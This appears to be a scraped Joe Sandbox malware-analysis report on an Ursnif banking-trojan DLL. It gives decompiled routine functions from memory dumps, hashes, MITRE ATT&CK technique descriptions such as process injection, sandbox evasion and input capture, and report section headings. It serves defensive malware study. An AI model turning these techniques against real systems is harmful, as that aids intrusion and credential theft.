Opcode Fuzzy Hash: db4b2302235fa02abb901d7c9750ce7c6ace4e32fba30aa5b3a5075a99a310a0
Instruction Fuzzy Hash: 8111C274704210878734AF68C8C1AD637D5AF89710B50B436F80ABB366CA34DCC1C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00E30840 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E30840(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t19;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t51;

				_t40 = __edx;
				_t39 = __ecx;
				if(__edx != 0) {
					_t51 = _t51 + 0xfffffff0;
					_t19 = E00E13598(_t19, _t50);
				}
				_t38 = _t40;
				_t46 = _t19;
				E00E13244(0);
				_t1 = _t46 + 0x38; // 0x38
				L00E164A0();
				_t47 = E00E2FD50(1);
				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
				 *((intOrPtr*)(_t47 + 8)) = 0xe30fc4;
				_t5 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
				_t48 = E00E3027C(1);
				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
				 *((intOrPtr*)(_t48 + 8)) = 0xe30fe4;
				_t10 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
				_t49 = E00E30548(1);
				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
				 *((intOrPtr*)(_t49 + 8)) = 0xe31004;
				_t15 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
				_t32 =  *0xe30900; // 0x0
				 *((char*)(_t46 + 8)) = _t32;
				_t33 =  *0xe7f8ec; // 0xf00b08
				E00E27360(_t33, _t38, _t39, _t46, _t49);
				_t35 = _t46;
				if(_t38 != 0) {
					E00E135F0(_t35);
					_pop( *[fs:0x0]);
				}
				return _t46;
			}

0x00e30840
0x00e30840
0x00e30845
0x00e30847
0x00e3084a
0x00e3084a
0x00e3084f
0x00e30851
0x00e30857
0x00e3085c
0x00e30860
0x00e30871
0x00e30873
0x00e30876
0x00e30879
0x00e30880
0x00e30883
0x00e30892
0x00e30894
0x00e30897
0x00e3089a
0x00e308a1
0x00e308a4
0x00e308b3
0x00e308b5
0x00e308b8
0x00e308bb
0x00e308c2
0x00e308c5
0x00e308c8
0x00e308cf
0x00e308d4
0x00e308d9
0x00e308de
0x00e308e3
0x00e308e7
0x00e308e9
0x00e308ee
0x00e308f5
0x00e308fd

APIs

RtlInitializeCriticalSection.KERNEL32(00E33C4C,00E33C14,?,00000001,00E33DAA,?,?,?,00E35015,?,?,00E34E34,?,0000000E,00000000,?), ref: 00E30860

Strings

|, xrefs: 00E30888
|, xrefs: 00E308A9

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: |$|
API String ID: 32694325-1831066999
Opcode ID: 124479ead51a673d0589d407bf44fbc27326c4a0de2cd1dde8d1ec4e631c1a81
Instruction ID: 75c74e943cd047cfb66f638e9a1d5f48736b8d268e0c4c2533650e61f0637626
Opcode Fuzzy Hash: 124479ead51a673d0589d407bf44fbc27326c4a0de2cd1dde8d1ec4e631c1a81
Instruction Fuzzy Hash: 8E11BEB1A00B019FC360EF2ED485A86FBE5BF84724704A52AE459E7B21D331F958CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E37208 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E37208(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0xe7f91f != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0xe7f900; // 0xe37208
					 *0xe7f900 = E00E36F70(3, _t15, _t18, _t19, _t20);
					_t16 =  *0xe7f900(_a4, _a8, _t19);
				}
				return _t16;
			}

0x00e3720e
0x00e37218
0x00e37242
0x00e3724b
0x00e37273
0x00e37273
0x00e3724d
0x00e3724d
0x00e37252
0x00000000
0x00000000
0x00e37252
0x00e3721a
0x00e3721f
0x00e3722c
0x00e3723e
0x00e3723e
0x00e3727e

APIs

GetSystemMetrics.USER32 ref: 00E37256
GetSystemMetrics.USER32 ref: 00E37268

Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0

Strings

MonitorFromPoint, xrefs: 00E3721A

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: d00c864c64a1a7635fe1c83477a176b0c2e0b2356972afac65981331763827e6
Instruction ID: 6addb7582d7019774d5c3d2b7d447073a04ee890f4d7a5f820a8fa72958176ee
Opcode Fuzzy Hash: d00c864c64a1a7635fe1c83477a176b0c2e0b2356972afac65981331763827e6
Instruction Fuzzy Hash: DA0184B1209249AFDB208F91ED48B5A7F95EB40354F045125FE58BB132C3729C84D790

Uniqueness

Uniqueness Score: -1.00%

Function 00E1EF28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E1EF28(intOrPtr* __eax, void* __ecx) {
				void* _t8;
				signed short _t19;
				intOrPtr* _t20;

				_t13 = __eax;
				_t19 =  *__eax;
				if(_t19 >= 0x14) {
					if(_t19 != 0x100) {
						if(_t19 != 0x101) {
							if((_t19 & 0x00002000) == 0) {
								if(E00E239DC(_t19, _t20) == 0) {
									L00E1D9A0();
									_t8 = E00E1EBF4(_t7);
								} else {
									_t8 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))();
								}
							} else {
								_t8 = E00E1EDAC(__eax);
							}
						} else {
							_t8 =  *0xe7f818();
						}
					} else {
						 *((short*)(__eax)) = 0;
						_t8 = E00E14068(__eax + 8);
					}
				} else {
					_push(__eax);
					L00E1D9A0();
					_t8 = E00E1EBF4(__eax);
				}
				return _t8;
			}

0x00e1ef2b
0x00e1ef2d
0x00e1ef34
0x00e1ef48
0x00e1ef5e
0x00e1ef6f
0x00e1ef85
0x00e1ef94
0x00e1ef99
0x00e1ef87
0x00e1ef8e
0x00e1ef8e
0x00e1ef71
0x00e1ef73
0x00e1ef73
0x00e1ef60
0x00e1ef62
0x00e1ef62
0x00e1ef4a
0x00e1ef4a
0x00e1ef52
0x00e1ef52
0x00e1ef36
0x00e1ef36
0x00e1ef37
0x00e1ef3c
0x00e1ef3c
0x00e1efa1

APIs

VariantClear.OLEAUT32(?), ref: 00E1EF37

Strings

\, xrefs: 00E1EF62

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: ClearVariant
String ID: \
API String ID: 1473721057-2545358515
Opcode ID: 658f7315e6efa27789886bf7e6379a5a55d72493ad8dfff515511405b85b558a
Instruction ID: 321fa7583e5251251e2e12d082df88391c8f80ea922586dd94ddfdda1a4df22a
Opcode Fuzzy Hash: 658f7315e6efa27789886bf7e6379a5a55d72493ad8dfff515511405b85b558a
Instruction Fuzzy Hash: D6F0AF717082108A87247B3498856E826D69F48700B607075FC4BBB316CB24CCCBC263

Uniqueness

Uniqueness Score: -1.00%

Function 00E37058 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E37058(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0xe7f91c == 0) {
					 *0xe7f8f4 = E00E36F70(0, _t8,  *0xe7f8f4, _t17, _t18);
					return GetSystemMetrics(_t8);
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

0x00e3705c
0x00e37066
0x00e3707a
0x00000000
0x00e37080
0x00e37088
0x00e37090
0x00e37090
0x00e37093
0x00e370a7
0x00e37095
0x00e37095
0x00e370ab
0x00e37097
0x00e37097
0x00e37097
0x00e37098
0x00e370af
0x00e3709a
0x00e3709b
0x00e3709e
0x00e370a0
0x00e370a0
0x00e3709e
0x00e37098
0x00e37095
0x00e370b4
0x00e370b7
0x00e370c1
0x00e370b9
0x00000000
0x00e370ba

APIs

GetSystemMetrics.USER32 ref: 00E370BA

Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0

GetSystemMetrics.USER32 ref: 00E37080

Strings

GetSystemMetrics, xrefs: 00E37068

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: 5b0146d135ff69a19bdc2036d097ee7c22a783698977757f446d02ac37a00a1b
Instruction ID: e0d283d31a544862a18594b86fe8d4b3ea91edfddce7b77588a72c4f05ac2243
Opcode Fuzzy Hash: 5b0146d135ff69a19bdc2036d097ee7c22a783698977757f446d02ac37a00a1b
Instruction Fuzzy Hash: 3EF0C2B011C2019ED73C9B34DD8CA623D959781334F647A21E295BA2D5C635CA84CE62

Uniqueness

Uniqueness Score: -1.00%

Function 00E26168 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E26168(void* __edx) {
				void* _t5;
				void* _t15;
				void* _t20;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t28;

				_t20 = __edx;
				if(__edx != 0) {
					_t28 = _t28 + 0xfffffff0;
					_t5 = E00E13598(_t5, _t27);
				}
				_t25 = _t5;
				E00E13244(0);
				 *((intOrPtr*)(_t25 + 4)) = E00E13244(1);
				_t2 = _t25 + 8; // 0x8
				L00E164A0();
				_t26 = E00E25E38(1);
				_t3 = _t25 + 4; // 0x6f724767
				E00E26F20( *_t3, _t26);
				 *((char*)(_t26 + 0x10)) = 1;
				_t15 = _t25;
				if(_t20 != 0) {
					E00E135F0(_t15);
					_pop( *[fs:0x0]);
				}
				return _t25;
			}

0x00e26168
0x00e2616d
0x00e2616f
0x00e26172
0x00e26172
0x00e26179
0x00e2617f
0x00e26190
0x00e26193
0x00e26197
0x00e261ae
0x00e261b0
0x00e261b5
0x00e261ba
0x00e261be
0x00e261c2
0x00e261c4
0x00e261c9
0x00e261d0
0x00e261d8

APIs

RtlInitializeCriticalSection.KERNEL32(00E25D58,?,?,?,00E2DF84,00000000,00E2DFB9), ref: 00E26197

Strings

`M, xrefs: 00E26186
pN, xrefs: 00E2619C

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: `M$pN
API String ID: 32694325-2449173935
Opcode ID: ef8259428fe1d44718d40ca6c4c5d04f1198839548a36978e68c36694137a6c0
Instruction ID: ccb1e8c8abe7527b22043e62bcfae22f9d197f8924b9d40df0992d3d845ef24e
Opcode Fuzzy Hash: ef8259428fe1d44718d40ca6c4c5d04f1198839548a36978e68c36694137a6c0
Instruction Fuzzy Hash: 14F0F6B33005119BC310FB79EC82A8AB7D6AF85758B086220F414FB356DB32AD5AC791

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hFGZpat9Mf.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_11720b30\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5399.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6656.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
hFGZpat9Mf.dll

Function 0076B448 Relevance: 312.8, APIs: 172, Strings: 6, Instructions: 1255
librarymemorywindowCOMMONCrypto

Function 0070557C Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Function 00705688 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
stringlibrarythreadCOMMON

Function 00701524 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Function 00705340 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 007016B8 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Function 0071DCE8 Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Function 00701380 Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Function 0072921C Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266
libraryloaderCOMMON

Function 007053C4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Function 00730108 Relevance: 7.7, APIs: 5, Instructions: 235
sleepCOMMON

Function 0072C54C Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Function 0074A9F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Function 00716C2C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON

Function 007210CC Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Function 0070C804 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 00708912 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 0072A41C Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Function 0072165C Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Function 0070B148 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 0070C10C Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 0070B194 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Function 007284AC Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Function 00721174 Relevance: .0, Instructions: 8
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre